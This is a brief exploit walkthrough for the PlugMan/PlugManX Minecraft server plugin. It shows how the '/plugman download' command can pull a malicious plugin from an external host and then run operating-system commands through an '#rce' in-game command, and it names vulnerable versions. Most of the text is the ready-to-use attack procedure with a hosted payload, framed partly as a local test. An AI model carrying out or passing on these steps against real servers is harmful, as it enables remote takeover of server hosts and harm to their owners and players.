PlugMan is a simple, easy to use plugin that lets server admins manage plugins from either in-game or console without the need to restart the server. The problem with this plugin is that it allows you to download plugins from unofficial sites.
The exploit is based on using the /plugman download command to download a malicious plugin to compromise the server.
To perform this exploit, the PlugManX /plugman download command must be enabled, then enter the following:
In this example, a malicious test plugin created by me is attached. Check that the plugin has loaded correctly Commands can now be executed remotely using the #rce command. In this example I use a command to open the notepad of my PC where the server is hosted. 01 Download the malicious plugin
$ /plugman download direct https://mcptoolspigotrce.mcptool.net/ 02 Test the infected plugin
$ #rce help 03 Run a command on the server operating system
$ #rce cmd start notepad.exe
Vulnerable versions of this plugin are 2.3.8 and below (Since version 2.3.7, the /plugman downlaod command is disabled by default).
You can download a server with everything you need to test the exploit locally on your PC from this link.